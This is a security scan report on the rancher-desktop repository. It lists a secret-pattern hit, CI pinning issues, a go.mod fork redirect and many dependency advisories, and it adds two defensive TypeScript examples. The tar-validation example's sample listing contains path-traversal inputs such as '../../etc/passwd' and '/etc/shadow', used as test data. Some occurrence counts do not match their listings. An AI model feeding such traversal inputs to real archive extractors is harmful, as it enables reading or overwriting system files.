55 of the 677 findings came from Repobility's proprietary detections; the ✓ Repobility tag marks them below.

Scan timing: clone 3.71s · analysis 60.83s · 7.4 MB · GitHub preflight 469ms

rancher-sandbox/rancher-desktop

https://github.com/rancher-sandbox/rancher-desktop · scanned 2026-06-05 18:18 UTC (4 days, 14 hours ago) · 10 languages

996 raw signals (540 security + 456 graph) · 12th percentile · TypeScript · large (100-500K LoC) · System graph score 50 (higher by 13)


Complete repo analysis

Last scanned 4 days, 14 hours ago · v2 · 400 actionable findings from 2 signal sources. 368 repeated signals grouped for readability. Security checks, system graph analysis, and verified AI-agent feedback are merged into one review queue.

Score breakdown (2026-05-18-v5)
Component            Sub-score  Weight  Contribution
structure_score           85.0    0.15         12.75
security_score            14.7    0.25          3.67
testing_score             72.0    0.20         14.40
documentation_score       90.7    0.15         13.61
practices_score           88.0    0.15         13.20
code_quality              58.0    0.10          5.80
Overall                           1.00         63.4
Active filters: excluding tests
Scan summary Quality grade C+ (63/100). Dimensions: security 15, maintainability 85. 540 findings (412 security). 115,993 lines analyzed.

Showing 309 of 400 actionable findings. 768 raw detector signals were grouped into reader-sized issues.

critical Security checks security secrets conf 0.95 Identified a Private Key pattern, which may compromise cryptographic security and sensitive data encryption.
Gitleaks detected a committed secret or credential pattern. The hit is inside a UI translation file, where the `PRIVATE KEY` marker often appears as user-facing text rather than as key material; open the cited line and confirm an actual key body (a base64 blob between BEGIN/END markers) is present before rotating anything. If a real key is committed, rotate it and purge it from history, since deleting the line alone leaves it recoverable from past commits.
pkg/rancher-desktop/assets/translations/en-us.yaml:694
low Security checks cicd CI/CD security conf 0.35 ✓ Repobility 3 occurrences Workflow references repository secrets in a pull_request workflow
Fork pull_request runs do not receive repository secrets on GitHub Actions (the `secrets` context is empty for fork PRs and GITHUB_TOKEN is limited to read access), so a `secrets.*` reference in a pull_request workflow is a reliability/intent signal, not direct fork-secret exfiltration. Raise severity only for pull_request_target, or another trusted-context trigger, that checks out and runs untrusted PR code while secrets are in scope.
lines 128, 129, 131
.github/workflows/package.yaml:128, 129, 131 (3 hits)
Tags: CI/CD security · workflow secrets · GitHub Actions
high Security checks software dependencies conf 0.88 @babel/plugin-transform-modules-systemjs: GHSA-fv7c-fp4j-7gwp
@babel/plugin-transform-modules-systemjs generates arbitrary code when compiling malicious input. yarn.lock hits cover dev and build-time dependencies as well as runtime ones; for each advisory below, check whether the package is bundled into the shipped application or only used during the build before treating the rating as exploitable.
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-2v35-w6hq-6mfw
xmldom: Uncontrolled recursion in XML serialization leads to DoS
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-f6ww-3ggp-fr8h
xmldom has XML injection through unvalidated DocumentType serialization
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-j759-j44w-7fr8
xmldom has XML node injection through unvalidated comment serialization
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-wh4c-j3r5-mjhp
xmldom: XML injection via unsafe CDATA serialization allows attacker-controlled markup insertion
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-x6wf-f3px-wcqx
xmldom has XML node injection through unvalidated processing instruction serialization
yarn.lock
high Security checks quality Quality conf 1.00 [SEC080] Archive extraction without member-path filtering: tarfile.extract*() without filter='data' allows path traversal (CVE-2007-4559, mitigated by PEP 706 in Python 3.12). Ported from bandit B202 (Apache-2.0).
The rule is written for Python, but the cited file is TypeScript, so the suggested `filter='data'` fix does not apply verbatim. The hazard is language-independent: validate every member name before extraction (reject absolute paths, `..` segments that climb above the destination, and symlink or hardlink targets that resolve outside it), or extract with a tar library that enforces these checks. In Python ≥ 3.12 that is `filter='data'`; in TypeScript, do the checks yourself or confirm that the library in use does.
scripts/dependencies/tar-archives.ts:133
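The hardened check the finding above asks for, carried into the language of the flagged file. This is an added example, not code from Rancher Desktop or from the scanner: the `TarEntry` shape, the function names and the sample listing are constructed for illustration. It refuses what Python's `filter='data'` refuses: absolute names, names that climb above the destination, and link entries whose targets resolve outside it.

```typescript
// Added example (not Rancher Desktop code): string-level validation of tar
// member paths before extraction, the TypeScript counterpart of Python's
// tarfile filter='data'. No filesystem access, so it is easy to unit-test.

type TarEntryKind = "file" | "directory" | "symlink" | "hardlink" | "other";

interface TarEntry {
  name: string;        // path stored in the archive header
  kind: TarEntryKind;
  linkTarget?: string; // present for symlink and hardlink entries
}

interface Verdict {
  ok: boolean;
  normalized?: string; // cleaned relative path, when ok
  reason?: string;     // why the entry was refused, when not ok
}

// Normalize a POSIX-style path without touching the filesystem. Returns null
// when the path is absolute, contains NUL, or climbs above the extraction root.
function normalizeArchivePath(p: string): string | null {
  if (p.includes("\0")) return null;
  const unified = p.replace(/\\/g, "/"); // a Windows host treats '\' as a separator
  if (unified.startsWith("/") || /^[A-Za-z]:/.test(unified)) return null;
  const parts: string[] = [];
  for (const seg of unified.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      if (parts.length === 0) return null; // would escape the root
      parts.pop();
      continue;
    }
    parts.push(seg);
  }
  return parts.join("/");
}

// Decide whether one entry may be written under the destination root.
function checkTarEntry(entry: TarEntry): Verdict {
  const normalized = normalizeArchivePath(entry.name);
  if (normalized === null) return { ok: false, reason: `unsafe member name: ${entry.name}` };
  if (normalized === "" && entry.kind !== "directory") return { ok: false, reason: "empty member name" };
  switch (entry.kind) {
    case "file":
    case "directory":
      return { ok: true, normalized };
    case "symlink": {
      // Resolve the target relative to the link's own directory; it must stay inside.
      const target = entry.linkTarget ?? "";
      const dir = normalized.split("/").slice(0, -1).join("/");
      const resolved = normalizeArchivePath(dir ? `${dir}/${target}` : target);
      if (resolved === null) return { ok: false, reason: `symlink ${normalized} -> ${target} escapes root` };
      return { ok: true, normalized };
    }
    case "hardlink": {
      // Hardlink targets are archive-root relative in tar.
      const target = normalizeArchivePath(entry.linkTarget ?? "");
      if (target === null) return { ok: false, reason: `hardlink ${normalized} -> ${entry.linkTarget} escapes root` };
      return { ok: true, normalized };
    }
    default:
      // Devices, FIFOs and the like are never needed from a dependency tarball.
      return { ok: false, reason: `unsupported entry type ${entry.kind}` };
  }
}

// Split an archive listing into the paths to extract and the reasons for refusals.
function partitionArchive(entries: TarEntry[]): { accepted: string[]; rejected: string[] } {
  const accepted: string[] = [];
  const rejected: string[] = [];
  for (const e of entries) {
    const v = checkTarEntry(e);
    if (v.ok) accepted.push(v.normalized as string);
    else rejected.push(v.reason as string);
  }
  return { accepted, rejected };
}

// Constructed sample listing (not taken from any real archive).
const SAMPLE_ENTRIES: TarEntry[] = [
  { name: "bin/", kind: "directory" },
  { name: "bin/tool", kind: "file" },
  { name: "./docs/../README.md", kind: "file" },  // normalizes to README.md
  { name: "../../etc/passwd", kind: "file" },     // classic traversal
  { name: "/etc/shadow", kind: "file" },          // absolute path
  { name: "bin/link", kind: "symlink", linkTarget: "../../outside" },
  { name: "bin/ok-link", kind: "symlink", linkTarget: "tool" },
  { name: "evil", kind: "hardlink", linkTarget: "/etc/hosts" },
  { name: "dev/null", kind: "other" },
];
```

A string-level filter like this is the first gate, not the last: extract regular files before link entries, or `lstat` the final path and confirm it still lies under the destination, because the filesystem may already contain symlinks this check never saw.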
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-6v7q-wjvx-w8wg
basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands
yarn.lock
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-chqc-8p9q-pq6q
basic-ftp has FTP Command Injection via CRLF
yarn.lock
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rp42-5vxx-qpwr
basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()
yarn.lock
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rpmf-866q-6p89
basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering
yarn.lock
high Security checks software dependencies conf 0.88 fast-uri: GHSA-q3j6-qgpj-74h6
fast-uri vulnerable to path traversal via percent-encoded dot segments
yarn.lock
high Security checks software dependencies conf 0.88 fast-uri: GHSA-v39h-62p7-jpjc
fast-uri vulnerable to host confusion via percent-encoded authority delimiters
yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-25h7-pfq9-p65f
flatted vulnerable to unbounded recursion DoS in parse() revive phase
yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-rf6f-7fwh-wjgh
Prototype Pollution via parse() in NodeJS flatted
yarn.lock
low Security checks cicd CI/CD security conf 0.90 ✓ Repobility 11 occurrences GitHub Action is tag-pinned rather than SHA-pinned
Action `actions/checkout` is referenced as `@v3`, a tag that the action's owner (or anyone who compromises that account) can move to a different commit. Pin external actions to a reviewed full commit SHA when the workflow is security-sensitive, keeping the version as a trailing comment so update tooling can still track releases.
2 files, 11 locations
src/go/networking/.github/workflows/release.yaml:19, 23, 34, 39, 51, 55 (8 hits)
src/go/networking/.github/workflows/go.yaml:14, 19 (3 hits)
Tags: CI/CD security · Supply chain · GitHub Actions
medium Security checks cicd CI/CD security conf 0.90 ✓ Repobility 4 occurrences GitHub Action is tag-pinned rather than SHA-pinned
Action `golangci/golangci-lint-action` is referenced as `@v3.1.0`; a patch-level tag looks precise but is still a mutable ref that can be re-pointed. Pin external actions to a reviewed full commit SHA when the workflow is security-sensitive, keeping the version as a trailing comment so update tooling can still track releases.
lines 28, 39
src/go/networking/.github/workflows/go.yaml:28, 39 (4 hits)
Tags: CI/CD security · Supply chain · GitHub Actions
high Security checks software dependencies conf 0.88 github.com/docker/docker: GHSA-rg2x-37c3-w2rh
Docker: Race condition in docker cp allows bind mount redirection to host path
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 github.com/docker/docker: GHSA-x86f-5xw2-fm2r
Docker: `PUT /containers/{id}/archive` executes container binary on the host
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 github.com/docker/docker: GO-2026-4883
Moby has an Off-by-one error in its plugin privilege validation in github.com/docker/docker
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 github.com/docker/docker: GO-2026-4887
Moby has AuthZ plugin bypass when provided oversized request bodies in github.com/docker/docker
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.90 ✓ Repobility go.mod replaces `github.com/lima-vm/lima` — redirects to fork `github.com/rancher-sandbox/lima`
`replace github.com/lima-vm/lima => github.com/rancher-sandbox/lima` overrides the canonical dependency with a different source (redirects to fork `github.com/rancher-sandbox/lima`). Local-path replaces are fine for monorepos but in published modules they can hide malicious forks from anyone who on…
Here the fork lives in the same GitHub organisation as this repository, so the redirect is first-party rather than a stranger's fork. What still merits review is that the replacement is pinned to an explicit version or pseudo-version, that go.sum covers it, and that the fork's delta from upstream is known and intended.
src/go/guestagent/go.mod:122
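One way to triage `replace` directives like the one flagged above, as an added example (not Rancher Desktop or Repobility code): a small scanner that parses a go.mod, sorts each directive into a local-path override, a same-module version pin, or a redirect to a different module, and surfaces the redirects that fall outside a reviewer-supplied list of trusted module prefixes. The go.mod text, module paths and versions are constructed for the example; only the lima redirect echoes the finding.

```typescript
// Added example (not Rancher Desktop code): classify the `replace` directives in
// a go.mod so a reviewer can separate monorepo path overrides from redirects to a
// different remote module. Pure string parsing, no filesystem or network access.

type ReplaceKind = "local-path" | "version-pin" | "redirect";

interface ReplaceDirective {
  oldPath: string;
  oldVersion?: string; // only present when the left side names a version
  newPath: string;
  newVersion?: string; // Go requires one for non-local replacements
  kind: ReplaceKind;
}

// Parse one `old [version] => new [version]` clause (keyword already stripped).
function parseReplaceClause(clause: string): ReplaceDirective | null {
  const m = clause.trim().match(/^(\S+)(?:\s+(\S+))?\s*=>\s*(\S+)(?:\s+(\S+))?$/);
  if (!m) return null;
  const oldPath = m[1];
  const newPath = m[3];
  let kind: ReplaceKind;
  if (newPath.startsWith("./") || newPath.startsWith("../") || newPath.startsWith("/")) {
    kind = "local-path";   // filesystem path: fine inside a monorepo
  } else if (newPath === oldPath) {
    kind = "version-pin";  // same module, different version
  } else {
    kind = "redirect";     // a different module entirely: review the source
  }
  return { oldPath, oldVersion: m[2] || undefined, newPath, newVersion: m[4] || undefined, kind };
}

// Walk a go.mod body, handling both `replace a => b` and `replace ( ... )` forms.
function scanReplaces(goMod: string): ReplaceDirective[] {
  const out: ReplaceDirective[] = [];
  let inBlock = false;
  for (const rawLine of goMod.split("\n")) {
    const line = rawLine.replace(/\/\/.*$/, "").trim(); // drop trailing comments
    if (line === "") continue;
    if (inBlock) {
      if (line === ")") { inBlock = false; continue; }
      const d = parseReplaceClause(line);
      if (d) out.push(d);
    } else if (line === "replace (") {
      inBlock = true;
    } else if (line.startsWith("replace ")) {
      const d = parseReplaceClause(line.slice("replace ".length));
      if (d) out.push(d);
    }
  }
  return out;
}

// Redirects to a module outside the caller's trusted prefixes (an assumption the
// reviewer supplies, e.g. the project's own GitHub organisation) need a human look.
function suspiciousRedirects(directives: ReplaceDirective[], trustedPrefixes: string[]): ReplaceDirective[] {
  return directives.filter(d =>
    d.kind === "redirect" && !trustedPrefixes.some(p => d.newPath.startsWith(p)));
}

// Constructed go.mod fragment; module paths and versions are illustrative only.
const SAMPLE_GO_MOD = `
module example.com/agent

go 1.22

require github.com/lima-vm/lima v1.0.0

replace github.com/lima-vm/lima => github.com/rancher-sandbox/lima v1.0.1

replace (
\tgithub.com/example/lib => ../lib // local checkout inside the monorepo
\tgolang.org/x/text v0.3.0 => golang.org/x/text v0.3.8
\tgithub.com/upstream/tool => github.com/someone-else/tool v0.2.0 // unreviewed fork
)
`;
```

Run against the real go.mod files on this page with the project's own organisation in `trustedPrefixes`, only redirects to third-party forks remain; the lima override would be reported as a redirect but not as suspicious.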
high Security checks software dependencies conf 0.88 go.opentelemetry.io/otel: GHSA-mh2q-q3fh-2475
OpenTelemetry-Go: multi-value `baggage` header extraction causes excessive allocations (remote dos amplification)
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5005
Key constraints not enforced in golang.org/x/crypto/ssh/agent
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5006
Agent constraints dropped when forwarding keys in golang.org/x/crypto/ssh/agent
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5013
Byte arithmetic causes underflow and panic in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5014
Bypass of certificate restrictions in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5015
Server panic during CheckHostKey/Authenticate in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5016
Memory leak when rejecting channels can lead to DoS in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5017
Client can cause server deadlock on unexpected responses in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5018
Pathological RSA/DSA parameters may cause DoS in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5019
Bypass of FIDO/U2F security key physical-interaction check in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5020
Infinite loop on large channel writes in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5021
Auth bypass via unenforced @revoked status in golang.org/x/crypto/ssh/knownhosts
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5023
VerifiedPublicKeyCallback permissions skip enforcement in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5033
Pathological inputs can lead to client panic in golang.org/x/crypto/ssh/agent
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 js-cookie: GHSA-qjx8-664m-686j
JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection
yarn.lock
high Security checks software dependencies conf 0.88 minimatch: GHSA-23c5-xmqv-rm74
minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
yarn.lock
high Security checks software dependencies conf 0.88 minimatch: GHSA-3ppc-4f35-3m26
minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
yarn.lock
high Security checks software dependencies conf 0.88 minimatch: GHSA-7r86-cg39-jmmj
minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
yarn.lock
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-37ch-88jc-xwx2
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple route parameters
yarn.lock
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-j3q9-mxjg-w52f
path-to-regexp vulnerable to Denial of Service via sequential optional groups
yarn.lock
high Security checks software dependencies conf 0.88 picomatch: GHSA-c2c7-rcm5-vvqj
Picomatch has a ReDoS vulnerability via extglob quantifiers
yarn.lock
high Security checks software dependencies conf 0.88 serialize-javascript: GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
yarn.lock
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-3955
CrossOriginProtection insecure bypass patterns not limited to exact matches in net/http. (Every `stdlib:` entry in this list is a Go standard-library advisory matched on the `go`/`toolchain` directive of the listed go.mod files. The fix for all of them is the same: build each module with a patched Go release. A go.mod match means the module builds with an affected toolchain, not that it calls the affected function, so confirm reachability with govulncheck before prioritising.)
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4006
Excessive CPU consumption in ParseAddress in net/mail
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4007
Quadratic complexity when checking name constraints in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4008
ALPN negotiation error contains attacker controlled information in crypto/tls
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4009
Quadratic complexity when parsing some invalid inputs in encoding/pem
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4010
Insufficient validation of bracketed IPv6 hostnames in net/url
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4011
Parsing DER payload can cause memory exhaustion in encoding/asn1
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4012
Lack of limit when parsing cookies can cause memory exhaustion in net/http
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4013
Panic when validating certificates with DSA public keys in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4014
Unbounded allocation when parsing GNU sparse map in archive/tar
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4015
Excessive CPU consumption in Reader.ReadResponse in net/textproto
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4155
Excessive resource consumption when printing error string for host certificate validation in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4175
Improper application of excluded DNS name constraints when verifying wildcard names in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4337
Unexpected session resumption in crypto/tls
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4340
Handshake messages may be processed at the incorrect encryption level in crypto/tls
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4341
Memory exhaustion in query parameter parsing in net/url
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4342
Excessive CPU consumption when building archive index in archive/zip
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 2 occurrences stdlib: GO-2026-4599
Incorrect enforcement of email constraints in crypto/x509
2 files, 2 locations
src/go/guestagent/go.mod
src/go/wsl-helper/go.mod
high Security checks software dependencies conf 0.88 2 occurrences stdlib: GO-2026-4600
Panic in name constraint checking for malformed certificates in crypto/x509
2 files, 2 locations
src/go/guestagent/go.mod
src/go/wsl-helper/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4601
Incorrect parsing of IPv6 host literals in net/url
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4602
FileInfo can escape from a Root in os
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4603
URLs in meta content attribute actions are not escaped in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4864
TOCTOU permits root escape on Linux via Root.Chmod in os in internal/syscall/unix
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4865
JsBraceDepth Context Tracking Bugs (XSS) in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 2 occurrences stdlib: GO-2026-4866
Case-sensitive excludedSubtrees name constraints cause Auth Bypass in crypto/x509
2 files, 2 locations
src/go/guestagent/go.mod
src/go/wsl-helper/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4869
Unbounded allocation for old GNU sparse in archive/tar
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4870
Unauthenticated TLS 1.3 KeyUpdate record can cause persistent connection retention and DoS in crypto/tls
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4918
Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4946
Inefficient policy validation in crypto/x509
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4947
Unexpected work during chain building in crypto/x509
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4971
Panic in Dial and LookupPort when handling NUL byte on Windows in net
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4976
ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4977
Quadratic string concatenation in consumePhrase in net/mail
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
